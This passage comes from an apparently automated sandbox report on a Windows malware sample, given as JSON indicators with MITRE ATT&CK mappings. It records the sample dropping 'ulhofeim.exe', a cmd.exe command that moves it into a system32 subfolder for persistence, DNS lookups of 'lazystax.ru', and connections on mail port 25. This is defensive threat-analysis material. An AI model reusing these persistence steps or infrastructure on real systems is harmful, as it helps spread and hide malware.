00000000-00002972)", "origin": "API Call", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-302", "type": 9, "relevance": 3, "name": "Tries to move files", "description": "Process \"cmd.exe\" with commandline \"/C move /Y \"%TEMP%\\\\ulhofeim.exe\" %WINDIR%\\\\system32\\\\njrbicei\\\\\" (UID: 00000000-00004276)", "origin": "Monitored Target", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"ulhofeim.exe\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"ulhofeim.exe\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"ulhofeim.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-1", "type": 7, "relevance": 1, "name": "Contacts server", "description": "\"<IPv4>:25\"\n \"<IPv4>:443\"\n \"<IPv4>:443\"\n \"<IPv4>:25\"", "origin": "Network Traffic", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-51", "type": 7, "relevance": 1, "name": "Queries DNS server", "description": "\"lazystax.ru\"\n \"microsoft-com.mail.protection.outlook.com\"", "origin": "Network Traffic", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d\" has an executable section named \".text\"\n \"ulhofeim.exe\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d\" has an writable section named \".data\"\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d\" has an writable section named \".text\"\n \"ulhofeim.exe\" has an writable section named \".data\"\n \"ulhofeim.exe\" has an writable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-125", "relevance": 3, "name": "PE file has a big raw size section", "description": "Raw size of \".reloc\" is \"0xd08000\" greater than 0x100000\n Raw size of \".reloc\" is \"0xa3f000\" greater than 0x100000", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-146", "name": "PE file contains Debug data directory", "description": "\"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"\n \"ulhofeim.exe\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d\" was detected as \"VC8 -> Microsoft Corporation\"\n \"ulhofeim.exe\" was detected as \"VC8 -> Microsoft Corporation\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "registry-26", "type": 3, "relevance": 2, "name": "Reads the windows installation language", "description": "\"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")", "origin": "Registry Access", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "binary-33", "type": 8, "relevance": 3, "name": "Drops executable files inside temp directory", "description": "\"ulhofeim.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%TEMP%\\ulhofeim.exe]- [targetUID: 00000000-00002544]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" trying to access non-existent file \"C:\\dbghelp.dll\"\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" trying to access non-existent file \"C:\\msvcr100.dll\"\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" trying to access non-existent file \"C:\\CRYPTBASE.dll\"\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" trying to access non-existent file \"C:\\PROPSYS.dll\"\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" trying to access non-existent file \"C:\\apphelp.dll\"\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" trying to access non-existent file \"C:\\version.DLL\"\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" trying to access non-existent file \"C:\\ntmarta.dll\"\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" trying to access non-existent file \"C:\\Secur32.dll\"\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" trying to access non-existent file \"C:\\SSPICLI.DLL\"\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"sc.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"ulhofeim.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"netsh.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"svchost.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" reads file \"c:\\25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\"\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" reads file \"c:\\users\\%osuser%\\desktop\\desktop.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\\MACHINELANGUAGECONFIGURATION\"; Key: \"\"; Value: \"\")\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\MUI\\SETTINGS\"; Key: \"\"; Value: \"\")\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\CONTROL PANEL\\DESKTOP\"; Key: \"\"; Value: \"\")\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\LANGUAGECONFIGURATION\"; Key: \"\"; Value: \"\")\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"\"; Value: \"\")\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"\"; Value: \"\")\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"\"; Value: \"\")\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\ERROR MESSAGE INSTRUMENT\"; Key: \"\"; Value: \"\")\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"\"; Value: \"\")\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"\"; Value: \"\")\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IME COMPATIBILITY\"; Key: \"\"; Value: \"\")\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"\"; Value: \"\")\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"\"; Value: \"\")\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\\TRACING\"; Key: \"\"; Value: \"\")\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLEAUT\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" trying to touch file \"C:\\dbghelp.dll\"\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" trying to touch file \"C:\\Windows\\system32\\dbghelp.dll\"\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" trying to touch file \"C:\\msvcr100.dll\"\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" trying to touch file \"C:\\Windows\\system32\\msvcr100.dll\"\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" trying to touch file \"pipe\\uqyipjlp\"\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" trying to touch file \"C:\\\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" trying to access non-existent file \"pipe\\uqyipjlp\"\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" trying to access non-existent file \"C:\\25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe.Local\\\"\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" trying to access non-existent file \"C:\\Windows\\System32\\cmd.exe:Zone.Identifier\"\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" trying to access non-existent file \"C:\\Windows\\System32\\sc.exe:Zone.Identifier\"\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" trying to access non-existent file \"C:\\Windows\\System32\\netsh.exe:Zone.Identifier\"\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" trying to access non-existent file \"C:\\25153247A5BB3A232E051B5FCC7BE2BD477A8DDD8E9A50CFFD78676AC2D6199D.EXE.LOCAL\"\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" trying to access non-existent file \"C:\\Windows\\System32\\cmd.exe:ZONE.IDENTIFIER\"\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" trying to access non-existent file \"C:\\Windows\\System32\\sc.exe:ZONE.IDENTIFIER\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-16", "type": 6, "relevance": 1, "name": "Connects to LPC ports", "description": "\"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" connecting to \"\\ThemeApiPort\"\n \"netsh.exe\" connecting to \"\\ThemeApiPort\"", "origin": "API Call", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-12", "type": 6, "relevance": 4, "name": "Monitors specific registry key for changes", "description": "\"netsh.exe\" monitors \"HKLM\\SYSTEM\\ControlSet001\\Control\\NetworkProvider\\HwOrder\" (Filter: 4; Subtree: 0)\n \"netsh.exe\" monitors \"HKLM\\SYSTEM\\ControlSet001\\services\\WinSock2\\Parameters\\Protocol_Catalog9\" (Filter: 1; Subtree: 0)\n \"netsh.exe\" monitors \"HKLM\\SYSTEM\\ControlSet001\\services\\WinSock2\\Parameters\\NameSpace_Catalog5\" (Filter: 1; Subtree: 0)\n \"netsh.exe\" monitors \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\" (Filter: 5; Subtree: 1)\n \"svchost.exe\" monitors \"\\REGISTRY\\USER\\.DEFAULT\\Control Panel\\International\" (Filter: 4; Subtree: 1)\n \"svchost.exe\" monitors \"HKLM\\SYSTEM\\ControlSet001\\services\\WinSock2\\Parameters\\Protocol_Catalog9\" (Filter: 1; Subtree: 0)\n \"svchost.exe\" monitors \"HKLM\\SYSTEM\\ControlSet001\\services\\WinSock2\\Parameters\\NameSpace_Catalog5\" (Filter: 1; Subtree: 0)", "origin": "API Call", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Caches\"\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" touched file \"%LOCALAPPDATA%\\Microsoft\\Windows\\Caches\"\n \"svchost.exe\" touched file \"C:\\Windows\\system32\\config\\systemprofile:.repos\"\n \"svchost.exe\" touched file \"C:\\Windows\\system32\\config\\systemprofile\\Local Settings:.repos\"\n \"svchost.exe\" touched file \"C:\\Windows\\TEMP\\wincookie.repos\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\temp\\ulhofeim.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"PREFERREDUILANGUAGES\"; Value: \"\")\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"MACHINEPREFERREDUILANGUAGES\"; Value: \"\")\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"PREFEREXTERNALMANIFEST\"; Value: \"\")\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"SAFEDLLSEARCHMODE\"; Value: \"\")\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"DISABLEMETAFILES\"; Value: \"\")\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"25153247A5BB3A232E051B5FCC7BE2BD477A8DDD8E9A50CFFD78676AC2D6199D\"; Value: \"\")\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"LOADAPPINIT_DLLS\"; Value: \"\")\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORUSESYSTEMHEAP\"; Value: \"\")\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORSYSTEMHEAPISPRIVATE\"; Value: \"\")\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"CWDILLEGALINDLLSEARCH\"; Value: \"\")\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\"; Value: \"\")\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"COMPATDLL\"; Value: \"\")\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"00060101.00060101\"; Value: \"\")\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM\"; Key: \"CONSENTPROMPTBEHAVIORADMIN\"; Value: \"\")\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM\"; Key: \"PROMPTONSECUREDESKTOP\"; Value: \"\")\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\"; Value: \"\")\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\"; Value: \"\")\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\"; Key: \"MAXIMIZEAPPS\"; Value: \"\")\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\"; Key: \"MAXIMIZEAPPS\"; Value: \"\")\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"BIAS\"; Value: \"\")\n \"25153247a5bb3a232e051b5fcc7be2bd477a8ddd8e9a50cffd78676ac2d6199d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"STANDARDNAME\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"ulhofeim.exe.67EE49C3.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"ulhofeim.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%TEMP%\\ulhofeim.exe]- [targetUID: 00000000-00002544]\n \"ULHOFEIM.EXE.67EE49C4.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-162", "type": 6, "relevance": 1, "name": "Renames files", "description": "\"cmd.exe\" renamed original file\"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\ulhofeim.exe\" to \"%WINDIR%\\system32\\njrbicei\\ulhofeim.exe\"", "origin": "API Call", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-9", "type": 6, "relevance": 4, "name": "Queries process information", "description": "\"netsh.exe\" queried SystemProcessInformation at 00000000-00002340-00000105-164383 [PID: 2340]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00002340-00000105-992348 [PID: 2340]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00002340-00000105-1815804 [PID: 2340]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00002340-00000105-2250557 [PID: 2340]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00002340-00000105-2878102 [PID: 2340]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00002340-00000105-3286242 [PID: 2340]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00002340-00000105-4558182 [PID: 2340]\n \"svchost.exe\" queried 